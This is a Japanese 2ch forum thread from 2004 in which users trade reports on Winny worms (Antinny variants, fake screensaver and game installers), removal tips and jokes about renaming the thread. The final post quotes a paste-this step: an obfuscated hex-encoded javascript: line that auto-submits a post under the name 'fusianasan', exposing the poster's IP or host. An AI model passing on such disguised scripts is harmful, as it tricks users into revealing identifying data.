個人情報が詰まってる可能性が高い各種メーラー一式を装った
ウイルスが出ると思って注意してたんだが結構出ないものだね。
好奇心で注意をそらすって感じでさ('Ａ`)

>>378
残念ながら、それも間違い。

>>380
そんなことするより、出たばかりの新しい漫画単行本とかゲームソフト
とかの名前で出す方がはるかにダウンロードされる、という現実を
皆知っているから。

ZIP用DLLにセキュリティホールがあった。
いまは修正されてる。

最新版にしときましょう。
http://www2.nsknet.or.jp/~micco/micindex.html

>>382
そういえばそうですな、確かに比じゃなさそう。

>>383
thanks
ぐぐってきます

>>356
虫歯の根絶なんて簡単だよ、歯を全部抜けばいい。
トロイ根絶にny撤廃ってのと、同じことだな。

昨夜から［私はポート0設定…］と[私には好きな…］が増加傾向にあるなぁ
本体はどこに転がってるんだろぅ？　単に、俺はブツを見たい、解析したい
だけなんだが。それっぽいの踏んだ人は報告ヨロ

>>368
死ね

>>371
それくらい調べろよぉ。オマエん家のｸﾞｸﾞﾙはナニやっとんじゃー！
ttp://www.forest.impress.co.jp/article/2004/07/30/arcsecurity.html

礼は「解凍レンジ」のｻｸｰｼｬにコイツの対応要望メル出すだけでｶﾝﾍﾞｿしたらぁｗ

>>388
ミスとは思いつつごめんなさい

>>386
解析してみた。
亜種は亜種だなというのが正直な感想。

ラグナロクやってるやつおおすぎ

NortonとかVirusBusterのsetup.exeに偽装したウイルスでも
対策してくれるんだろうか。

自社ソフトのwarezを使おうとして感染した奴は心情的には放っておきたいだろうが
そうすると評判が落ちるのかな。

>>392
しない理由は何もない。

馬鹿はノートンぐらい買えよ
WIndowsマスターならアンチウィルスソフトなんかいらんがな

>>392
しなかった場合、対策した他社からあそこのソフトは対応できていないと
攻撃される材料になるだけ。

>>394
それも間違い。

した場合、割ってもいいですよというお墨付きがもらえるわけだな

>>397
ウイルスに対処するのと、割れに対処するのは別問題。

Antinny.AとKにひっかかったみたいだけど
これはどんな影響でるの？

>>399
ググれヴヴォケ

>>399,>>1
＞質問はテンプレを読んでからにして下さい。
＞読まずに質問しても「テンプレ嫁」と切り返されるだけです。

酷いスレになったな・・

抽出ID:vHQIITP6 (4回)

345 名前：[名無し]さん(bin+cue).rar[sage] 投稿日：04/11/07(日) 16:38:48 ID:vHQIITP6
香ばしいのが多くなったね・・・

349 名前：[名無し]さん(bin+cue).rar[sage] 投稿日：04/11/07(日) 16:58:38 ID:vHQIITP6
・・・・・・

372 名前：[名無し]さん(bin+cue).rar[sage] 投稿日：04/11/07(日) 18:21:16 ID:vHQIITP6
厨密度高すぎ・・・

402 名前：[名無し]さん(bin+cue).rar[sage] 投稿日：04/11/07(日) 19:25:09 ID:vHQIITP6
酷いスレになったな・・


ID:vHQIITP6が一番内容のないレスしてるしｗｗｗｗｗｗｗｗ

>>403
それも間違い

ノートン先生、2005から要あくちべーしょん
まいなーワームにも対応するよ、でも違法コピーじゃ定義ファイルを
更新させないからちゃんと金出してね。と先生はおっしゃっておられるｗ

ageが多いね。

ここって、最新版ウイルススキャンで未対応のニュイルススレだと思ってた
違ったのね？

ﾆｭｲﾙｽ(・∀・)ｲｲ!

>>394
上級者ほど対策は疎かにしないものだし自分の能力にも過信しない
連中はユーザの脆弱性を糧にして成長したんだからな

とりあえず知ったか厨は5年ばかしROMってろやヴォケ

「自称中級者が一番危ない」ってよく言うしな

そんな俺は自称中級者

ニュイルス検証がｵﾓﾛｲかもしれんが
ときたま質問スレに。

結局この亜種らしきものは解明してないのか？
　>>104　

結局、仙台が梱包されたてたエロゲーってどのソフト？

メイドさんしぃしぃ

>>367
351ではないけど参考になりました。
ありがとうございました。

不安なら仮想OS使えばいいじゃん。

仮想でもSSは流れるじゃん

個人情報をカケラも入れてない専用マシンで運用するのが大吉。

>>412
こんねこ
グリーングリーン２
と聞いているが。

そういえば少し前、
「グリーングリーン２もう流れてるよ〜」
と何もないのに書き込んでる香具師がいたが、
そいつが今回のやつを作ったのかもしれん。

CDのオートラン解除しなくても
もうウィルス定義更新されたから
オートランでexe実行する前に未然に防いでくれるよね？

>>416
ウィルスだったら消せばいいじゃん。

オートランは常時OFFにして、
必用な時だけこのテのソフトで任意に実行させるのが無難。

AutoRun Executer
http://www.vector.co.jp/soft/win95/util/se061704.html

>>420
亜種踏むぞ。エロゲ落とすのなんてやめとけ。

エロゲは実験機で確認してくれる神が居るから逆に安心して落とせるんだけどな。
それを知らないアフォが引っかかってるだけだろ。

>>413
ﾜﾛﾀｗ

>>411
まだ判明してない。感染者は徐々に増加中。かなり深刻だと思うよ。これ。
地引してるんだが、あまりに酷い（人生終わりそうなのばっかり）ので、ちょっと躊躇してるぐらい。

特に、クラスタワードで、ショタ関係とか、交換用とかにしてる香具師。危なすぎ(w

現在は[私はポート…］と［私には好きな…］で晒されてるファイルと、
仙台キンタマで流されてるSSとで、ユーザー名あたりで関連性を調べてる

買ってきてベリファイするならともかく、稼動実験だけだと遅効性トロイに直撃しそうだ。

>>621
ｗｉｎｎのフォルダ以外のトコにＵＰフォルダを作ってるのかもしれない
フォルダ情報からパスもわからないんならとりあえず検索してみる

一応、こっちにもいってみる
【警報】Winnyを狙ったワーム・ウイルス情報 Part30
http://tmp4.2ch.net/test/read.cgi/download/1099709559/

誤爆です

スレが正常化しつつあるね

（・∀・）ﾆﾔﾆﾔ

>>428
了解しました。

亜種踏んでもーた　orz

win.iniいじられてる椰子は直ぐに
回線を切って首を鶴がよかろう。ホホホ

昨日から世話になってる者なんですが、
やっぱりずっと稼動してる必要あるんで再ｲﾝｽｺは不可っぽいのです。
申し訳無いんだが
>>254で聞いたファイル名を指定して実行で打ち込むやつを晒してくれないか。
svchost32.exe　を消したいんですが。

デスクトップ画面が定期的に写真取られてるのがどうも気持ち悪い。

>>276
Nyはコレに懲りてしばらく止めます。
その代わり半年ROMって厨房脱出しよう orz

自業自得だよ
モラルに反する事したからだ
だから諦めな

ｎｙやるんだったら少々（？）のリスクは覚悟しないと。

>>276がいいこと書いてるぞ。

>>434
メモ帳で上書きしてしまうっていう方法とか
ttp://homepage3.nifty.com/t-sugiyama/
の
Reboot File Deleter Ver.1.13
ていうのを使ってみなよ。

del "C:\windows\system32\svchost32.exe"
と打ち込むと
'del'が見つかりません。
名前を正しく入力したかどうかを〜
と出て何もできないのですが。
やや、上のテンプレサイトは読みましたよ。

>>438
ありがとうございます。
しかしパソコン管理〜じゃないのでログインできませんでしたorz

>>439
>>276

アンチウイルスってのが出るまで待って、
nyは放置しておけば無問題なんでしょうか。
なんか気になるんで時間毎にupフォルダに加わる
デスクトップの写真は消してるんですが。

ウイルスに関して質問があります。
急に画面が血で真っ赤になって、「ぬるぽ」という文字が出てきました。
これはなんという名前のウイルスなんでしょうか？？
「きんたま」ではないと思うのですが…

Antinnyに感染してupフォルダとup.txtができてました。
駆除しようとしてウイルスバスター2005の体験版や
トレンドマイクロのオンラインスキャンを使ったんですが
発見できませんでした。
何ででしょうか？
レジストリエディタを
ファイル名から検索をしたらメモ帳が起動します。

>>439は釣りか？とりあえず下げろ

>>443
まだパターンファイルが対応してないから。

>>439
ウイルスにかかったのを根治せずに対処療法だけで使い続ける
のはどうかと思うな。ずっと稼働している必要があるマシンな
ら、なおさらだ。

致命的な行動を起こすタイマーが、いまもカウントダウンし続
けている可能性もあるんだし、管理者なりにきちんと報告して
初期化するのがいちばん安全。

事情をあまり知られたくないから、自力でどうにかしようとい
うのはわからんでもないけど、次のゾロ目は今週の木曜日だ。
その時になって大騒ぎになるくらいなら、明日の朝一番に頭下
げて対処してもらったほうがいい。

>>442,>>1
＞質問はテンプレを読んでからにして下さい。
＞読まずに質問しても「テンプレ嫁」と切り返されるだけです。

なんでまたこんな質問ばかりなのか、少しは自分で調べようや

>>445
どうしたらいいでしょうか？

（・∀・）ﾆﾔﾆﾔ

>>443,>>1
＞質問はテンプレを読んでからにして下さい。
＞読まずに質問しても「テンプレ嫁」と切り返されるだけです。

なんでまたこんな質問ばかりなのか、少しは自分で調べようや

スクリーンセーバー実行しました。
バスター反応。削除
タスクマネージャーが起動できなくなる。レジストリで直しました。

なんでこう次々とアホが引っかかるの？

>>439
ざっと見ただけでよくわからんが、svchost32.exeを消せばいいってことだよね？

セーフモードで起動して消せばいいんじゃないの？

アホだから

>>439
いい加減スレ違いだから余所へ逝け
ここはWindowsの初心者質問スレじゃねぇぞ


>>442-443
既出ウィルスの対策お助けスレでもねぇぞ
テンプレ読んで自分で対処汁
できないのなら回線切って首を吊れ

ﾋｬｯﾋｬｯﾋｬ ヽ(ﾟ∀ﾟ)ﾒ(ﾟ∀ﾟ)ﾒ( ﾟ∀ﾟ)人(ﾟ∀ﾟ )ﾒ(ﾟ∀ﾟ)ﾒ(ﾟ∀ﾟ)ﾉ ｯﾋｬｯﾋｬｯﾋｬ

>>442-443
わるいことはいわん再インスコしとけ。

>>451
上げるなボケ厨房がよってくるだろ！
ってお前か厨房は

各社の対応状況はどうなってんだ？
とりあえず前スレあたりのは対応ってこといいのか？
あと特攻したやつは状況お願いします、、

>>448
OS再インストール。

ここは新種ウィルスの情報交換と
ウィルス駆除できないくて焦るアホを眺めて（・∀・）ニヤニヤするスレだから、
アホが書き込んでも（・∀・）ニヤニヤされるだけだぞ。
基本的に。

>>460のが言うように
以後、厨房質問は無視の方向でいきましょう皆様

>>Winnyをフォルダごと削除
と書かれてますがDOWNフォルダもなんですか？

アホはアホでも自助努力の形跡が認められれば、
(・∀・)ﾆﾔﾆﾔしながら教えてやらんこともない

気分が(・∀・)ｲｲ!時限定でな

あとキャラが面白かったら教えてあげる人が多いな。
都合が悪い書き込みをすべてキャンセルする462みたいなのは
面白くないばかりかうざくてしつこいから一番教えたくない。

なんかさ、そろそろ
ユーザー1ウイルス感染
↓
ユーザー1のスクリーンショット自動UP
↓
2chで晒されて一般ピーポーアクセス
↓
jpgにウイルスが自動に組み込まれるようになってて見た人も感染
↓
ユーザー2・3・4.....

ってのも出てきそうだな
Winnyなんぞやめとけ

>>463
もう２度と使いません。
ただ今までに落としたファイルだけは残しておきたいんです。

元祖仙台GAはAV大手ほぼ対応ってことであとは
「ポート0」とか「私」なんだがこいつらは中身別物なのか？
俺いまだに落ちてこないから確認できなんだが....
他にニュイルス情報は無いよな？

上の方で仮想OS使えばいいじゃんって案が出てるけど
実際つかった香具師入るのかな
使ってみれば分かるけど、動作が遅くてまだ実用レベルじゃないぞ
ホストOSからゲストOSにファイル転送するだけで何時間かかることやら

>>468
VMとか俺のマシンじゃくそ重いから
前スレで特攻したときは、余剰パーツ急造して実験したぞ
正直仮想OSはしんどいと思う。
特攻するなら安全領域必要だな...

>>466
何で俺を名指しすんだ？　指名料高いぞｗ

つか、おまいは>>463の一行目に該当しないから教えてやらん

え？IDE7200回転だけどCD一枚3分でコピーできるし
ゲストOS用のCDのソースをバーチャルCDにすれば
コピーする必要さえないんだが？

>>468
多分言ったの俺だけど実際使ってない。
アプリ落とさないから必要ないんだよね。
でもウィルス駆除してる時間に比べれば楽なもんじゃない？
転送終わるまで放置しときゃいいんだし。

スレタイが微妙だから、お助けスレだと思って
やってくる香具師は後を絶たない罠

じゃあスレタイかえる？

>>468
マシンスペックは並だが、ファイルのコピー以前の問題でもたつくのが嫌。
音楽再生すらダメ。

エロゲとかアプリの動確以外に使い道は無い。

VMはファイルの動作確認に使うだけで、それでP2Pもしろって
意味ではないでそ。仮想側で発動しても、Undosableすればい
いだけだし。

次からスレタイ変えますかー
ダメポ、俺の頭じゃ良いスレタイ思いつかない

>>466
ただ言える事は、ny使ってた記憶も落としたファイルもウィルスごと全部消去してしまった方が良い

>>476
orz
俺winny動かして感染状況調べてたよ
所詮ザコでした(;´д｀)

しかしまだ落ちてこないのだが「仙台好き」どうなってんだ？

スレタイ思いつかね。

現行スレタイ形式のケツに【既出質問厳禁】でも付けときゃ良いんじゃね？

一度ｎｙ使った奴が抜け出せるはずがない。

【警報】を外すだけでも少しは変わると思うんだが、どうよ？

できればスレタイからウィルスという文字をなくしたいなぁ。
検索厨も減ると思うし。

こんにちは私は最近インターネットエクスプロラをやりはじめました彩子と申します
色々あるですねけいじいた？
びっくりしちゃいました＾＾
ここなら初心者のわたしでも色々みなさが教えてくれそうですね＾＾
これからよろしくおねがいします！！！！！！！！！！！！！！
はやくみなさんと仲良くなれるようにｇんばるす

まぁ無理か。

確かに警報外すのはいい手だと思う
【特攻】○○【求む】とかどうよ？（笑）

スレタイエロゲスレみたいにしたらどうよ？

別にスレタイそのままで良いのでは？
新種やらアフォが出ない限りそれ程賑わう訳でもないし、
ただ初心者お断り・テンプレ嫁はもっとアピールすべきだとは思うが

密かにshareウィルススレと統合したかったんだが、もうこの様子だと無理だろうなぁ

>>470
調べても出ないんです。
Shell32
というのがでて本文は
Runtime error とでています。

>>482
全部無料だもんな〜
麻薬みたいなもんなんだろうな。

Winnyワーム・ウイルス構造解析Part31

こんなのどうだ？

shareと統合はコッチを敵視してるやつがいるから無理だと思うぞ

>>492
イイ！と思う。

Linux上でWinをエミュレートしてる場合でも感染するのか？

。・゜・(ノД`)・゜・。
svchost32.exe消すのだけ助けて下さい。
ファイル名を指定して〜のコマンド教えてくれるだけで良いんで。
セーフモードはいくらF8押してもなりませんでした。WinXPです。

age1てすんません。

>>463頑張れw、なんか知らんがID:l46fp57Pは高い指名料払う気満々らしい

>>492
それで行ってみようよ
で、>>487つけて決定で（冗談です）

>>492
(・∀・)ｲｲ!!と思う。

>>490
だから何で俺なんだYO
>>470以外で直レスしてねぇだろが

>>1-10音読して勝手に対処汁

ウイルスをニュイルスにしておけば検索に引っかからないだろ(w

バックアップとってクリーンインストールした方が何かと安心

もうぬるぽーす

(・∀・)ｩｨﾙｽｰ!!スレpart31とかの方がいいんでねーの？
普通の検索のしかたじゃ引っかからないように。
たまたま「ウイルス」で変換したら「(・∀・)ｩｨﾙｽｰ!!」になったから思いついただけだけど。

ニュイルス捨てがたいな。

ニュイルスに1表！

【特攻】Winnyを狙ったワーム・ニュイルス構造解析Part31【求む】

全部混ぜてみたｗ

名前は「AntinySendaiGalaxyAngel」で

最後にsつけるの忘れた

>>508
ワームもニャームにしてくれ（w。

ニュイルスいいね。
ワームも変えたいところだ。
狙ったも変えたいな。

Winnyのばい菌情報Part31

【特攻】Winnyを狙ったニャーム・ニュイルス構造解析Part31【求む】

何のスレだｗ

>>513
ﾋﾞﾋﾞﾋﾞと来ました。

ニャーム・ニュイルス・・・
もう誰もちか

じゃあ
WinnyのニュイルスPart31

なんてのは？

>>496
システムの復元で感染前まで戻せ。あとはWinnyフォルダで
改変されたファイルを、手動で修復すれば元通り。
これが一番手っ取り速いぞ。

svchost32.exeだけ消したいならばsystem32フォルダを開いて
svchost32.exeの名前を変えろ。
あとはタスクマネージャで２つあるsvchost32.exeのプロセスを終了
すれば普通に消せるはずだ。

ただし、svchost32.exeを消すだけでは根本的な解決にはならんぞ。
デスクトップSSのアップロードは止まるが、レジストリエディタの上書き
が治まらない場合がある。

>>514
「にゃ」と「にゅ」が来たなら、「にょ」も欲しいところだな。

【特攻】Winnyを狙ったニャーム・ニュイルス構造解析Part31【求むにょ】

感染者を嘲笑するスレ31

winnyといれたら検索に引っかかって
結局現状と変わらないような希ガス

>>520
それ感染者が来ないからｗ

winnyを入れずににょを入れるならこの際こんな感じに。

【特攻】ニィを狙ったニャーム・ニュイルス構造解析Part31【もにょむ】

とりあえず>>209や>>443は通報しといた

「にょ」はやめとけ
かえって変なのが寄って来そうだ

>>523
住人でさえ寄り付かなくなるな・・・ｗ

それ以外は良いのかよ

>>421
流れたSSは消せないじゃん

次スレ案>>492に禿同

で、ちょいと新亜種（というか時限発動？）らしきものもあるので経時報告

・元祖仙台キンタマ→先生対応済み
　　　症状その他は>>38参照

・[私には好きな…］→感染源不明、同様亜種に[私はポート0…］もある
　　　感染者のPC内の.txt .doc .jpgをパック詰めして放流
　　　仙台キンタマの亜種らしい。
　　　女性名のスクリーンセーバ偽装ものが感染源との話もあるが、発動条件不明

・仙台キンタマが放流したSSを、（画像詰め合わせ）として放流するタイプ
　　　元祖仙台キンタマの時限発動ものかも知れない？
　　　元祖仙台は、コード解析まで至っていないので、この機能を持つかどうか不明

やべースレタイわけわからんようになってるやん（笑）

構造解析とかやめたらはずかしいな

>>519>>523
ﾊｹﾞﾜﾗ
もう何のスレか想像出来ないYO

構造解析Part31は？

「ウィルスを肴にイキがった中学生みたいな雑談」というのが
いちばん妥当だけどね。実際は。

Winnyウイルス学 その傾向と対策31

>>534
でも新種が出たときはちゃんと解析してくれる人もいるからねぇ。

シンプルに
【解析】ﾆｭｲﾙｽ Part.31【捷報】

>>518
使用中で名前を変更出来ないと出ると思うが、
あとタスクマネージャでマルチプロセス止める事は至難の業ではないか？

＞デスクトップSSのアップロードは止まるが、レジストリエディタの上書き
＞が治まらない場合がある。

レジストリエディタは一度メモ帳で上書きされたら、自動で治る事は無いし（従って駆除しても元には戻らない）
上記がレジストリだとしたら、書き換えはsvchost32.exeが行うのではないのか？

質問者がこないと新種の発見が難しいし、かといって既出の
ウイルスの事聞かれんのもな〜

>>533
大学の教科書の例題みたいだなぁ

Winnyを狙ったワーム・ウィルス解析 Part31
が適当だと思う。

そうだね、構造解析なんて実態より偉そうだね。
一部の神は別にして。
「ニャームニュイルス雑談にょ」か

>>518
マジでありがとうございました。
明日管理者権限使わせてもらって復元します。
感染日っていうのはsvchost32.exeの横にある日付で問題無いですよね？
余裕もってもうちょっと前まで戻しますが。

レジストリエディタの上書きってのは何か問題があるのでしょうか。
兎に角ありがとうございました。迷惑かけてスマソ(´・ω・`)

明日また来るな。

【（・∀・）ﾆﾔﾆﾔ】ﾆｨﾆｬﾆｮPart31【（ ´,_ゝ｀）ﾌﾟｯ】

エロゲー落としてた奴は反省してエロビデオに路線変更しろ そうすりゃ安心

じゃー、無難に>>540で行きますか？

>>529特攻しようにも本体落ちてこねー

>>538
色々と読み間違えてた・・・スマン無視して>>518

>>546
いーや、ﾆｭｲﾙｽは外せん

ﾆｭｲﾙｽWinny支店part31

>>518氏
>>538氏のとおり名前の変更は出来ませんでした…

>>529の女性名のスクリーンセーバ偽装ものが感染源との話もあるが、発動条件不明、にひっかかっちまった・・・
でもプログラムエラーが出たらしくてログ作成してます窓が出て、それをすぐさまキャンセルしたんだけど、
どこか感染したんだろうか？

ニュイルスはいいね。
勝手な話だけどさ、新種の質問や状態の話は歓迎で
既出のはカンベンてとこだよね。
さてそれが「ニュイルス＝新種ウイルス」で伝わればいいんだが。

649 ：602 ：04/11/07 22:33:21 ID:y7+CCqft
602で質問したものなのですが、
>>608氏の指摘しているウイルスにかかってしまい、
ダウンロード板の該当スレでsystem32にあるsvchost32を消さないといけないらしいのですが、削除が出来ません。

プログラムを指定して実行の欄に打ち込むのを晒して頂けないでしょうか？
“ ”の位置とかが違うのか理由はよく分からないのですが、
いくら微調整して打ち込んでもむ
'del'が見つかりません。名前を正しく入力したかどうかを〜
と出て何もできません。

参考したサイトはhttp://www.geocities.jp/kemkzuenc/Antinny.htmlです

おまいら速いよ・・・少し落ち着け・・・な

情報ｽﾚとして機能してくれ('A`)

あのあからさまなフォルダ偽装にかかるとは・・・
トリップなしのファイル詰め合わせは無視の方向で

ニュイルスってニュウ＋ウィルスって意味だったのか。
ずっとニュース＋ウィルスだと思ってた。

>>552
伝わらん、伝わらんｗ

scrの亜種を間違って実行したかもしれないんだけど、
ファイル検索で、bugfixとかwnconfig.txtが検出されなければ平気？
あと、仮に感染しててもny関連のファイルとかには感染しないから
アドレス帳とかバックアップとって再インスコでＯＫ？

>>538
＞使用中で名前を変更出来ないと出ると思うが

これは俺も最初そう思ったんだが、出来る。

＞タスクマネージャでマルチプロセス止める事は至難の業ではないか？
svchost32.exeの名前を変えてから片方のプロセスを止めると、復活できなく
なるらしい。片方ずつ潰していけば完全に止められる。

＞レジストリエディタは一度メモ帳で上書きされたら、自動で治る事は無い
これは言い方が悪かった。
svchost32.exeを消した後、本物のレジストリエディタで、メモ帳のレジストリエディタ
を上書きしても、またメモ帳で上書きされてしまうということ。


といっても、俺が検証したのはこ○ねこからを採取した仙台キンタマだから、
他の亜種では違う結果になるかも。

気がついたら500超えてる！はえぇー
で名前の意見まとめると
マジメな感じだが恥ずかしくないのでニュイルスいれるってことだよな？
「Winnyワム・ニュイルス解析」でどうよ？原点復帰てことで

おれもにゅいるすがいい

Winny芋虫・ﾌﾞﾙｰｽ解析

【新種を】Newirus【発見】

んだ、>>540でいいや。

>>546
特攻するって、例の女性名スクリーンセーバ偽装ものか？
ファイルサイズで415232byte、作成日 11/3 20:25:44 のやつな
特攻すると、Windows\system32\netowork に何か作られる（パック詰め）ところ
までは事例があるんだが、そこからの放流プロセスが不明なのよね。

女性名スクリーンセーバものは 370〜390KBぐらいのファイルだから、
すぐ見つかると思う。ここんとこ、今までとは違うパターンのも流れ始めたが
捏造物も見かけるようになってきた。

Cookieを流すタイプなので、これを自分のマシンのIEキャッシュに置いて、
同じユーザー名/IDで、該当サイトにログインすると…結構えげつないな。

じゃあ560を採用で行きます？
あんまり長引かせて情報が流れると困る人いそうだし。

ワームやウィルスで困ってる人間が、あせってスレタイ検索しても
引っかからないようなタイトルつけるんじゃねーよ、馬鹿

［仙台ギャラクシーエンジェルズ］ニュイルス［俺のデスクトップ］

>>559
色々と勘違いして変な言い方をしてしまって本当にスマン、んでまた突っ込むが

＞これは俺も最初そう思ったんだが、出来る。

これがあのアフォの一番聞きたい事だろうな

＞svchost32.exeを消した後、本物のレジストリエディタで、メモ帳のレジストリエディタ
＞を上書きしても、またメモ帳で上書きされてしまうということ。

って事はまだ他にもプロセスが残ってるつう事で良いのか（setup.exe,ごみ箱.exe,他？）

ゆいるすみたいで嫌だ

アンニュイみたいで嫌だ

>>566
ワームやウィルスで踏んだヌケ作が、あせってスレタイ検索しても
引っかからないようなタイトルにしてんだよ、ヴォケ

じゃあ１でひたすらテンプレ嫁！
初心者の質問スレじゃない！を強調する？

にゅるぽ

>>573
ギャッ

>>573
ニャッ！

>>571
つまみがなくなる・・・。
情報交換だけなんて会議みたいのはいやだ

もう何でもいいや・・・

闇金みたいにさ、助ける振りしてさらに泥沼に引きずり込むように誘導すべし

やっちまったダブルクリック31

ウィニー+ウィルス＝ウィニルス

【報連相】ウィニルス part31

１でひたすら強調するかーそれも手だねー
スレタイは決まらんから
今のままでウイスルだけニュイスルにする方向で行こう
あと警告外して

【テンプレ読まなきゃﾆﾔﾆﾔされます】Winnyを狙ったワーム・ウイルス情報 Part31

>>582
それいい！

.src偽装のウイルスに関する情報が少ないですね。
自分も誤って踏んでしまったのですが、再インスコするかどうか考え中。。
とりあえずこのスレと前スレ情報は熟読して怪しいファイルを探したが皆無。
ＵＰフォルダもupfolder.txtの生成もなし。
とりあえず現時点でwinnyで個人情報がばら撒かれる心配はなさそうです。
ただしなんらかの時限爆弾があるかも知れない点が心配。

ちなみに自分の場合、.srcをダブルクリックしたものの、
なんだか実行できないと言うメッセージ（詳細忘れた）が出て途中で止まり、
タスクマネージャで強制終了しました。結局発動しなかったのかもしれません。

クリックしたけど発動しなかったぽいという人はほかにも何人かいましたね。

【警報】Winnyワーム・ウイルス情報&解析 Part31

変更ならこんなとこが無難だと思うけど、
どうせｽﾚﾀｲ変えたところで>>1嫁で終わるﾖｶｰﾝ。

>>578
も一回やってみたが、svchost32.exeの名前変更は可能だった。
（svchost32.exeのプロセスが存在する状態でsystem32フォルダ内の
svchost32.exeの名前を変更）

レジストリエディタの方はWindowsの仕様かな？本物のレジストリエディタ
を他のexeで上書きしても、すぐに本物のレジストリエディタで上書きされてしまう。

仮想PC含む３台のPCでやったが、どれも同じ結果だった。(全てWinXP)
俺の環境の問題なのかワーム側の種類の違いかは分からんが。

>>550,>>578
いい加減な事言ってｽﾏｿ。

>>584
特攻したら先生に全力で制止された。

間違ったorz

>>578=×
>>568=○

http://gb.bbs.ws/book.php?book=pop
http://anitou.honesto.net/up/1/img-box/img20040902074841.html
http://qma2ch.hp.infoseek.co.jp/cgi-bin/img-box/img20040614030433.jpg
http://www.google.co.jp/search?hl=ja&btnI=I%27m+Feeling+Lucky&lr=lang_ja&q=sahra1354
http://strangeworld-honten.com/cgi-bin/bbs.cgi

このウイルスにやられてしまったのですが対処法がいまいち分かりません。
分かる方教えてください。

直リンかよ

ぁゃιぃ

>>584
お前FajhENk7だろ。まだ居るのかよ。
とっととOS再インスコしろ。

>>589
先生の仕事増やすなボケ！

今日は寝とくはー乙マタ夜に

>>589=荒らしｹﾃｰｲ

>>584
Windows\System32以下に\networkができていないか？その中に、パック詰めが入っていないか要チェック
.src偽装ものが[私…］の実体だとしたら、HDDサーチして、.jpe.doc.xls.txtを探してパックするのに
相当な負荷がかかるはず

>>587
.scr偽装の.exeという時点で先生が警告するのかな？ ファイルそのものだと先生は警告しないし

家具屋のアレも落ちてきた。確かに、こりゃ酷ぇ

ところでさ、System32ってadmin権限無しでいじれるのか？
質問君は管理者権限がどーのとか書いてなかったか？

>>596
Windows\System32以下に\networkはありません。
負荷も通常通りなのでとりあえず様子見です。
nyは当分やめておきますがね。

スレタイ変えてもどうせ厨はやってくるんだから、ひたすら罵倒するか無視すりゃいいって。

誰も答えないけど質問スレを立てればいいと思う

家具屋のサイトに掲示板が無いのが悔やまれるね
フォームやメアドに特攻した勇者いるのかね

>>600
仙台は下に隔離誘導すればいいんじゃない？ｗ

【仙台ギャラクシーエンジェルズ】Winny新ウィルス
http://tmp4.2ch.net/test/read.cgi/download/1099799904/l50

>>602
すでに逆誘導されてるんですけどｗ
本部にされてるｗ

関係ないけど仙台市民なのでなんか見るたびに複雑な気持ちになる。

>>603
知ってるけどねｗ

新ウイルスでお祭りになったら、
ここは情報解析だけで、祭り・質問は個別スレでして欲しい。
じゃないと余計な話挟まって有益な情報流しかねない。

そんなわけでループな話はあちらでして欲しい。

>>605
まあそうなんだけど、この板で秩序を求めても空しいだけだ

お前らのやってるのは情報解析じゃなくって
情報収集だけですから


残念！


ニュイルス斬り

SCRには動作パターンが複数ある模様。

自分で確認したのは、
・ディスク上から.txtなどを収集してアーカイブ
・仙台ギャラクシーっぽいZIPファイルの中身を再アーカイブ(ハッシュ値を変えるため?)
・何もしない(多重感染防止?)
の3パターン。
しつこく実行してたら、何もしなくなった。

いきなりがだ、まぁアレだ。感染した可能性がある（＝そういう感じがした/身の覚えがある）やつはまだマシだ。
ノートン先生でもタスクマネージャでもレジストリでもシステムディレクトリでもどれ見ても
感染したような痕跡はないが、「こんだけのことやってて何故感染しないんだ」と
自暴自棄になってこのスレを隅々まで読みながらいつ感染するかｶﾞｸﾌﾞﾙしてるような
小心者の俺なんか重傷だべ。

・・・と、睡眠不足な自称上級者が愚痴をこぼしてみるてｓｔil|li＿|￣|○il|li＠ｳｨﾙｽ探索3日目

>>609
俺もそんな感じ。SCR実行しちゃったっぽいんで
今サブマシンに必要なデータコピーして
明日にでも再セットアップしようかと思ってる。

scr踏んだけどエラー?が出てウイルスは実行されなかった可能性が高いのですが
やはり再インスコするこにします。精神衛生上よくないので…
バックアップは取ったので週末にでもやってみます。

週末は終わったばかりだが・・・？
今度の週末まで放置ってことか？
ｶﾞﾝｶﾞﾚ!

試しに[仙台ギャラクシーエンジェルズ] で始まるZIPファイルを落としてみたんだけど
膨大な量の個人情報が書かれたテキストファイルととscrだった。
scrはフォルダのアイコンで「マイドキュメント(空白).scr」でした。

その空白はバカ長いやつですか？　　　　　　　　　　　　　　　　　　　　　srcみたいに

>614
そうです

どもです

仙台きんたまの現物を手に入れたいんだがどこにある？
とりあえず上の方で情報が出ているグリーングリーン２とかいうののイメージ落として
中身を見てみたが特に怪しいファイルやプログラムは見つからんかった。
仮想PC上で実行しようとしてるけど如何せん転送に時間がかかる、うーむ。

VMwareならわざわざ転送を行わなくても
メニューのVMからsettingを選らんで
CD-ROMのconnectionをuse physical driveで
ホストOSのdaemon toolsとかのバーチャルドライブ（グリーングリーン2のイメージをマウントしてるやつ）
を選択すれば転送する必要はないよ

>>613
それって、陽子〜とかだよな、名前とメルアドと住所（やたらでかいtxtファイル）
ほかの女性名の詰め合わせ（scr入り）は、"個人情報"という文字だけが並んでる数KBのTXT付き
だから、本当に個人情報が入ってるのは捏造じゃないかと考えられる

>>617
元祖仙台キンタマは、「こんねこ」とかいうエロゲのcon_setup.exeだっけ？
入手済みなのは2本ある、104960bytes（10/29）と108032bytes（10/30）

やっぱフリーじゃなくて、ちゃんとしたエミュレータが必要かな
でもVMWare高いしな（割れろってか？そりゃないぜ）
ま、とりあえず評価版使ってこんねこの方を試してみる。
情報サンクス

>>620
ダウソ板にいて何故そんな発言

なぁ、お前らならもうとっくに知ってると思うけど
ShareでもNyでもない新手？のダウンロードソフトって何？？

ヤフオクで販売してるんだけど、そのソフトウェアのウィンドウっぽいのが
載ってたけど見たことない・・・
↓
http://page11.auctions.yahoo.co.jp/jp/auction/n9767700

NyとShare位は知ってたがこれは知らない・・
DLスレでもあまり無いような気がするんだけど、
知ってる人是非教えてくれ〜
最近、雑誌とか全然見ないから波に乗り遅れてるよ・・・

>>621
ダウソ板にいるからって割れにどっぷり漬かりきったクズばかりではない

買ったらお前でもわかるんじゃね？

http://tmp4.2ch.net/test/read.cgi/download/1099660337/165
165 ：[名無し]さん(bin+cue).rar ：04/11/08 04:14:08 ID:yyXSggKu
2ch専用ブラウザを使用している人は、
ＩＥなどの一般的なブラウザでこのスレを開いておく。

１、
javascript:s='7769746828646f63756d656e742e666f726d735b305d297b46524
f4d2e76616c75653d2766757369616e6173616e273b4d4553534147452e7661
6c75653d275c75353134345c75386362345c75373533625c75353063665c
75333034665c75333036305c75333035355c7533303434273b7375626d697
42e636c69636b28293b7d';for(l=0,e="";l<s.length;l+=2)e+='%'+s.substr(l,2);eval(unescape(e));
